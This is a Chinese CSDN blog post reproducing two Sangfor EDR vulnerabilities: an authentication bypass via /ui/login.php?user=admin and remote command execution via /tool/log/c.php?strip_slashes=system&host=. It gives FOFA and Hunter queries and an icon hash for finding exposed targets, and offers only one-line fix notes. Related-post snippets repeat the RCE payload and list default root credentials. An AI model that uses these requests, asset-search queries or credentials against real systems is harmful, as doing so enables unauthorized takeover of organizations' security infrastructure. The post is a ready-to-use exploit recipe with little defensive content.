记某信漏洞复现

已于 2023-10-17 11:57:48 修改
阅读量163 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 网络 网络安全 web安全
于 2023-10-12 15:55:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/133792728
版权

 

深信服-SANGFOR终端检测响应平台漏洞复现

通常访问的页面如下,存在登录框

信息收集

FOFA语法

 

  1. title="SANGFOR终端检测响应平台"
 

需重点关注框框的图标,可以聚焦资产搜索
 

 

 

 

  1. icon_hash="1307354852"
 

鹰图搜索
 

 

  1. web.title="SANGFOR终端检测响应平台"
 

可聚焦资产
 

 

  1. web.icon=="68e28d49856759ddeb91b6be3d6f7e42"
 

 

 

SANGFOR终端检测响应平台 - 任意用户免密登录
 

漏洞复现
 

路由后拼接/ui/login.php?user={{需要登录的用户名}}
 

这边以admin权限用户为例
 

 

  1. GET /ui/login.php?user=admin HTTP/1.1
  2. Host: {{Hostname}}
 

访问之后会像这样直接进入后台
 

 

 

修复方案
 

该类逻辑漏洞的起因往往与鉴权有关,需做好权限校验
 

SANGFOR终端检测响应平台 - 前台RCE
 

同一套系统
 

漏洞复现
 

路由后拼接/tool/log/c.php?strip_slashes=system&host={执行的命令}
 

命令执行以id为例
 

 

  1. GET /tool/log/c.php?strip_slashes=system&host=id HTTP/1.1
  2. Host: {{Hostname}}
 

大致页面如下所示
 

 

 

修复方案
 

该目录代码层面的逻辑问题,需要进行鉴权以及重写等处理
 

                             hack渗透视频教程,扫码免费领
 

 

 

                

        

        

        

    




    

      

        

            

              
                
                  zkzq
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
服PHP,深服终端检测响应平台 EDR 代码审计

				
			

			

				

					weixin_30089411的博客
				

				

					03-19
					
					2458
					
				

			

		

		

			
				
今年 HW 深服的 EDR 爆出了一些很低级的漏洞,也看到网上不少人再吐槽,国光也忍不住来分析看看。基本配置息网上地下流传的深服的 EDR ISO 文件实际上是 CentOS7 镜像,下面国光简单分享录一下相关息,然后面看到的朋友少走弯路。首先 ISO 安装的话,不要使用快速安装,直接挂载即可,相关的账号密码为:用户名密码rootedr@sangfor安装完成默认是静态 IP,得配置...

			
		

	



                

              
                



	

		

			

				
					
漏洞是什么.txt

				
			

			

				

					01-31
				

			

		

		

			
				
漏洞

			
		

	



                


  
              

                


	

		

			

				
					
服EDR远程命令执行

				
			

			

				

					
				

				

					07-01
					
					279
					
				

			

		

		

			
				
伟大的生命,不论以何种形式,将会在宇宙间永存。我们这个小小星球上的人类,也将继续繁衍和发展,直至遥远的未来。可是,生命对于我们来说又多么短暂,不论是谁,总有一天,都将会走向自己的终点。死亡,这是伟人和凡人共有的最后归宿。热情的诗人高唱生命的恋歌,而冷静的哲学家却说:死亡是自然法则的胜利……是的,如果一个人是按自己法则寿终正寝,就生命而言,死者没有什么遗撼,活着的人也不必过分地伤痛。最令人痛心和难以接受的是,当生命的花朵正蓬勃怒放的时候,却猝然间凋谢了。人类之树谁知凋落了多少这样的花朵。冷落成泥,只有香如故…

			
		

	





	

		

			

				
					
服行为感知系统和终端检测响应平台EDR REC渗透测试

				
			

			

				

					kelenwait的博客
				

				

					06-24
					
					1772
					
				

			

		

		

			
				
简介
深服行为感知系统和终端检测响应平台EDR是深服科技股份有限公司推出的安全产品,其行为感知系统 c.php 存在远程命令执行漏洞,与其相同模板的还有部分EDR,同样导致远程命令执行。
漏洞影响
深服EDR 3.2.16
深服EDR 3.2.17
深服EDR 3.2.19
深服 行为感知系统
漏洞
登录界面

c.php 远程命令执行漏洞 使用以下poc进行访问
/tool/log/c.php?strip_slashes=system&host=echo hello
/tool/l

			
		

	



		

			
		



	

		

			

				
					
服行为感知系统&&日志中心 远程命令执行漏洞

				
			

			

				

					西米安全
				

				

					06-07
					
					2600
					
				

			

		

		

			
				
标题
声明
1、该公众号发布文章仅供学习使用。
2、请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

漏洞描述
深服行为感知系统&&日志中心 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行
影响范围
深服 行为感知系统和日志中心
漏洞
漏洞地址:
/tool/log/c.php?strip_slashes=system&host=

首页:

执行:
https://ip/tool/log/c.php?strip_sla

			
		

	





	

		

			

				
					
服EDR(终端检测响应平台)远程命令执行

				
			

			

				

					Websec
				

				

					08-18
					
					4377
					
				

			

		

		

			
				
服edr远程命令执行

1、POC

http:xxxxxx/tool/log/c.php?strip_slashes=system&host=id



2、FOFA语法

语法 title="终端检测响应平台"

https://fofa.so/result?q=%E7%BB%88%E7%AB%AF%E6%A3%80%E6%B5%8B%E5%93%8D%E5%BA%94%E5%B9%B3%E5%8F%B0





3、案例

漏洞页面:










...

			
		

	





	

		

			

				
					
一次某漏洞

				
			

			

				

					2301_80115097的博客
				

				

					10-16
					
					42
					
				

			

		

		

			
				
Casdoor系统static存在任意文件读取漏洞漏洞描述】Casdoor是一个基于OAuth 2.0、OIDC、SAML 和 CAS 的,UI-first的身份和访问管理(IAM)/单点登录(SSO)平台。使用 Go 和react开发,前后端分离,内置第三方应用登录服务。

			
		

	





	

		

			

				
					
汇总-一次对某高校微小程序的漏洞挖掘-0基础息安全知识点

				
			

			

				

					程序员三九的博客
				

				

					05-21
					
					378
					
				

			

		

		

			
				
挖掘目标的部署在微的资产(减少息的收集,毕竟一般web站点没有账号密码不好进入后台,挖掘功能点少)1.寻找目标的微小程序(非原图)2.招生小程序打不开

			
		

	





	

		

			

				
					
录一次时序数据库的实战测试

				
			

			

				

					蚁景网安学院
				

				

					10-26
					
					547
					
				

			

		

		

			
				
在某次Edusrc挖掘过程中,我发了一个404状态码的ip站。我的直觉告诉我,这个站不太简单。于是我息搜集了一下端口为8086的常见服务,当我看到这个InfluxDB的时候,我灵感突然来了。

			
		

	





	

		

			

				
					
人工智能给文化安全带来挑战

					
最新发布

				
			

			

				

					yzf060109的专栏
				

				

					06-28
					
					463
					
				

			

		

		

			
				
算法是自动学习、自动决策的技术,但这并不意味着算法是“技术中立”的,算法的使用者、运营者赋予一定的目标从而发挥其效用。由于“息茧房”中的息是同质化的,人们的思维和观点也会变得封闭和单一。通过模仿名人或权威人士的言论和行为,“深度伪造”技术不仅可能损害他们的名誉,还能捏造出从未发生过的事件或情境,造成公众对实际发生事件的误解,并可能引发诽谤、欺诈和社会恐慌等一系列问题。由于算法技术的杂性和专业性,加之公共权力机构在授权和监管上的不足,以及当前对于算法治理手段的相对落后,这种算法驱动的权力正在迅速扩张。

			
		

	





	

		

			

				
					
内容安全习 8 - 视觉内容伪造与检测

				
			

			

				

					infinity_heaven的博客
				

				

					06-22
					
					1152
					
				

			

		

		

			
				
人脸检测。

			
		

	





	

		

			

				
					
JVM常用概念之安全点

				
			

			

				

					nanxiaotao的博客
				

				

					06-25
					
					895
					
				

			

		

		

			
				
那么 JVM 如何让所有线程进入安全点状态?问题在于将线程暂停在已知状态,而不仅仅是中断它。为了实此目标,如果观察到“安全点标志”,JVM 会让 Java 线程在方便的位置自行暂停。

			
		

	





	

		

			

				
					
自主可控的芯片设计供应链软件:保障芯片产业安全的关键

				
			

			

				

					YouyuanXway的博客
				

				

					06-27
					
					393
					
				

			

		

		

			
				
在当前的科技浪潮中,芯片作为息技术的核心,其设计、制造和供应链的安全性和自主可控性显得尤为重要。而自主可控的芯片设计供应链软件,正是保障这一产业链安全的关键环节。

			
		

	





	

		

			

				
					
Java中的加密与解密:实安全的数据传输

				
			

			

				

					java666668888的博客
				

				

					06-23
					
					532
					
				

			

		

		

			
				
大家好,我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿!在当今息安全至关重要的时代,保护数据的安全性是每个开发人员都需要关注的重要议题。本文将深入探讨Java中的加密与解密技术,帮助你实安全的数据传输。

			
		

	





	

		

			

				
					
ToDesk漏洞

				
			

			

				

					09-23
				

			

		

		

			
				
ToDesk漏洞的具体步骤需要根据具体情况进行分析和测试,没有明确的引用内容提供相关息。然而,一般来说,漏洞的基本步骤包括以下几个方面:

1. 收集息:了解目标是什么,确定漏洞类型,并获取相关的文档和资料。

2. 漏洞分析:仔细研究漏洞的原理和攻击方法,分析目标系统的弱点和易受攻击的部分。

3. 搭建测试环境:在安全的测试环境中搭建目标系统的副本,以便随意测试和实施攻击。

4. 漏洞:根据已知的漏洞息和攻击技术,尝试在测试环境中重漏洞。这可能包括发送恶意数据、利用系统的弱点或执行其他攻击行为。

5. 分析结果:录和分析攻击的效果和结果,包括成功获取敏感息、绕过访问控制等。

6. 提供修建议:根据漏洞的结果,提供相应的修建议和安全措施,以减少漏洞对目标系统的威胁。



			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值